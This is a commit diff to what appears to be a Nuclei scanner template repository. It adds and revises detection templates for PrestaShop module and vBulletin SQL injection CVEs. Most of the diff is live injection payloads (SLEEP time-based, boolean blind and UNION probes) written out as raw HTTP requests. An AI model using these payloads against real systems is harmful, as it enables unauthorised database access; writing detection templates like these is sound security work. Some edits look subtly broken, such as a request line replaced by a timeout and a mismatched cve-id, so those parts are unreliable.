Optimized some templates due nuclei change and added new templates

2024-07-14 19:15:12 +03:00 · 2024-07-14 19:15:12 +03:00 · 425e6e7c99
parent af2f5ade84
commit 425e6e7c99
17 changed files with 240 additions and 29 deletions
--- a/http/cves/2015/CVE-2015-4455.yaml
+++ b/http/cves/2015/CVE-2015-4455.yaml
@ -48,6 +48,7 @@ http:
        {{randstr}}
        --a54906fe12c504cb01ca836d062f82fa--
    host-redirects: true
    matchers:
      - type: dsl
        dsl:
--- a/http/cves/2016/CVE-2016-6195.yaml
+++ b/http/cves/2016/CVE-2016-6195.yaml
@ -43,7 +43,7 @@ http:
      - "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
    stop-at-first-match: true
-
+    host-redirects: true
    matchers-condition: and
    matchers:
      - type: word
--- a/http/cves/2019/CVE-2019-7139.yaml
+++ b/http/cves/2019/CVE-2019-7139.yaml
@ -24,11 +24,11 @@ http:
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 12s
        GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
        Host: {{Hostname}}
-    stop-at-first-match: true
+    host-redirects: true
    matchers-condition: or
    matchers:
      - type: dsl
--- a/http/cves/2022/CVE-2022-22897.yaml
+++ b/http/cves/2022/CVE-2022-22897.yaml
@ -34,9 +34,7 @@ info:
 http:
  - raw:
      - |
-        GET /modules/appagebuilder/config.xml HTTP/1.1
+        @timeout: 12s
        Host: {{Hostname}}
      - |
        POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
@ -60,28 +58,22 @@ http:
        X-Requested-With: XMLHttpRequest
        leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
-    extractors:
+
-      - type: regex
+    host-redirects: true
-        name: version
+    max-redirects: 3     
        part: body_1
        internal: true
        group: 1
        regex:
          - "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
    matchers:
      - type: dsl
        name: time-based
        dsl:
-          - 'duration_2>=6'
+          - 'duration_1>=6'
-          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
+          - 'status_code_1 == 200 && contains(base64(body_1), "eyJwcm9kdWN0X29uZV9pbWciOltdfQ==")'
        condition: and
      - type: dsl
        name: blind-based
        dsl:
-          - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
+          - 'status_code_1 == 200 && contains(base64(body_1), "eyJwcm9kdWN0X29uZV9pbWciOltdfQ==")'
-          - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")'
+          - 'contains(body_2, "content") && contains(body_2, "{{Hostname}}")'
-          - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")'
+          - '!contains(body_3, "content") && !contains(body_3, "{{Hostname}}")'
-          - 'len(body_3) > 200 && len(body_4) <= 22'
+          - 'len(body_2) > 200 && len(body_3) <= 22'
        condition: and
--- a/http/cves/2023/CVE-2023-27034.yaml
+++ b/http/cves/2023/CVE-2023-27034.yaml
@ -67,16 +67,16 @@ http:
        submitComment=
        ------------YWJkMTQzNDcw--
      - |
-        GET /modules/jmsblog/config.xml HTTP/1.1
+        GET / HTTP/1.1
        Host: {{Hostname}}
-    stop-at-first-match: true
+    host-redirects: true
-
+    max-redirects: 3 
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
-          - 'contains(body_2, "Jms Blog")'
+          - 'contains(body_2, "jmsblog")'
        condition: and
 # digest: 4a0a00473045022100b9f9b8cc6b64a6d4a7f59d009c1b93c8e00bf31220947f1984254c5ffda4601c022017fb76e27e4d3550f19969a20b834066f6ed8bca4aa11e7fbde5f3b6122e0068:922c64590222798bb761d5b6d8e72950
--- a/http/cves/2023/CVE-2023-27847.yaml
+++ b/http/cves/2023/CVE-2023-27847.yaml
@ -0,0 +1,83 @@
 id: CVE-2023-27847
 info:
  name: PrestaShop xipblog SQL Injection
  author: mastercho
  severity: critical
  description: |
    In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27847
    - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27847
    cwe-id: CWE-89
    epss-score: 0.04685
    epss-percentile: 0.91818
  metadata:
    redirects: true
    max-redirects: 3
    framework: prestashop
    shodan-query: http.component:"Prestashop"
  tags: cve,cve2023,prestashop,sqli,unauth,xipblog
 http:
  - raw:
      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        @timeout: 20s
        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        @timeout: 20s
        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        @timeout: 20s
        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        @timeout: 20s
        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562),NULL,NULL--+- HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
    stop-at-first-match: true
    host-redirects: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_2>=5'
          - 'status_code_1 == 200 && contains(body_1, "xipblog")'
        condition: and
      - type: dsl
        name: blind-based
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "xipblog")'
          - 'contains(body_3, "kr_blog_post_area")'
          - '!contains(body_4, "kr_blog_post_area")'
        condition: and
      - type: dsl
        name: union-based
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "xipblog")'
          - 'contains(body_5, "c8c605999f3d8352d7bb792cf3fdb25b")'
        condition: and
--- a/http/cves/2023/CVE-2023-30150.yaml
+++ b/http/cves/2023/CVE-2023-30150.yaml
@ -38,9 +38,11 @@ http:
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 12s
        GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
        Host: {{Hostname}}
    host-redirects: true
    matchers:
      - type: dsl
        dsl:
--- a/http/cves/2023/CVE-2023-39650.yaml
+++ b/http/cves/2023/CVE-2023-39650.yaml
@ -0,0 +1,62 @@
 id: CVE-2023-39650
 info:
  name: PrestaShop Theme Volty CMS Blog SQL Injection
  author: mastercho
  severity: critical
  description: |
    In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650
    - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27847
    cwe-id: CWE-89
    epss-score: 0.04685
    epss-percentile: 0.91818
  metadata:
    redirects: true
    max-redirects: 3
    framework: prestashop
    shodan-query: http.component:"Prestashop"
  tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog
 http:
  - raw:
      - |
        @timeout: 20s
        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        @timeout: 20s
        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        @timeout: 20s
        GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
    host-redirects: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_1>=5'
          - 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
        condition: and
      - type: dsl
        name: blind-based
        dsl:
          - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
          - 'status_code_2 == 200 && status_code_3 == 302'
        condition: and
--- a/http/cves/2023/CVE-2023-45375.yaml
+++ b/http/cves/2023/CVE-2023-45375.yaml
@ -16,12 +16,15 @@ info:
 http:
  - raw:
      - |
        @timeout: 12s
        POST /module/pireospay/validation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
    host-redirects: true
    max-redirects: 3   
    matchers-condition: and
    matchers:
      - type: dsl
--- a/http/cves/2023/CVE-2023-46347.yaml
+++ b/http/cves/2023/CVE-2023-46347.yaml
@ -36,6 +36,8 @@ http:
        search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
    host-redirects: true
    max-redirects: 3   
    matchers:
      - type: dsl
        dsl:
--- a/http/cves/2024/CVE-2024-36683.yaml
+++ b/http/cves/2024/CVE-2024-36683.yaml
@ -0,0 +1,53 @@
 id: CVE-2024-36683
 info:
  name: PrestaShop productsalert SQL Injection
  author: mastercho
  severity: critical
  description: |
    In the module “Products Alert” (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36683
    - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-36683
    cwe-id: CWE-89
    epss-score: 0.04685
    epss-percentile: 0.91818
  metadata:
    redirects: true
    max-redirects: 3
    framework: prestashop
    shodan-query: http.component:"Prestashop"
  tags: cve,cve2023,prestashop,sqli,unauth,productsalert
 http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        @timeout: 20s
        POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
    stop-at-first-match: true
    host-redirects: true
    matchers:
      - type: dsl
        name: time-based
        dsl:
          - 'duration_2>=5'
          - 'status_code_1 == 200 && contains(body_1, "modules/productsalert")'
        condition: and
--- a/http/exposed-panels/openbullet2-panel.yaml
+++ b/http/exposed-panels/openbullet2-panel.yaml
@ -28,6 +28,8 @@ http:
      - type: word
        words:
          - "<title>OpenBullet2</title>"
          - "<title>Openbullet2WebClient</title>"
        condition: or
      - type: status
        status:
--- a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
+++ b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
@ -10,26 +10,28 @@ info:
    - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/#pll_switcher
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Prestashop"
  tags: prestashop,sqli
 http:
  - raw:
      - |
        @timeout: 12s
        POST /m/apmarketplace/passwordrecovery HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        X-Requested-With: XMLHttpRequest
-        email=" AND (SELECT 3472 FROM (SELECT(SLEEP(6)))UTQK)-- IGIe&submit_reset_pwd=
+        email="+AND+(SELECT+3472+FROM+(SELECT(SLEEP(6)))UTQK)--+IGIe&submit_reset_pwd=
    host-redirects: true
    max-redirects: 3   
    matchers:
      - type: dsl
        dsl:
-          - 'duration_2>=6'
+          - 'duration_1>=6'
-          - 'contains(body, "module-apmarketplace-passwordrecovery")'
+          - 'contains(body_1, "module-apmarketplace-passwordrecovery")'
        condition: and
 # digest: 4b0a00483046022100b48440bd6c3340453db529a4aa26ebfc2720ca154ed673b86253139e316d9fa3022100c353a472d66ba11b085155b28ee58f92dce4988e04ba847f68aefa70fd759a4d:922c64590222798bb761d5b6d8e72950
--- a/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml
+++ b/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml
@ -57,6 +57,8 @@ http:
        GET /upload/{{filename}}.html HTTP/1.1
        Host: {{Hostname}}
    host-redirects: true
    max-redirects: 3   
    matchers-condition: and
    matchers:
      - type: word
--- a/http/vulnerabilities/vbulletin/arcade-php-sqli.yaml
+++ b/http/vulnerabilities/vbulletin/arcade-php-sqli.yaml
@ -19,6 +19,8 @@ http:
    path:
      - "{{BaseURL}}/arcade.php?act=Arcade&do=stats&comment=a&s_id=1'"
    host-redirects: true
    max-redirects: 3   
    matchers-condition: and
    matchers:
      - type: word
--- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml
+++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml
@ -21,12 +21,15 @@ info:
 http:
  - raw:
      - |
        @timeout: 12s
        POST /ajax.php?do=inforum&listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&result=10 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        undefined&s=&securitytoken=guest
    host-redirects: true
    max-redirects: 3   
    matchers:
      - type: dsl
        dsl:
--- a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
+++ b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml
@ -23,6 +23,8 @@ http:
        contenttypeid=7&do=process&humanverify=1&cat[]=-1%27
    host-redirects: true
    max-redirects: 3   
    matchers-condition: and
    matchers:
      - type: word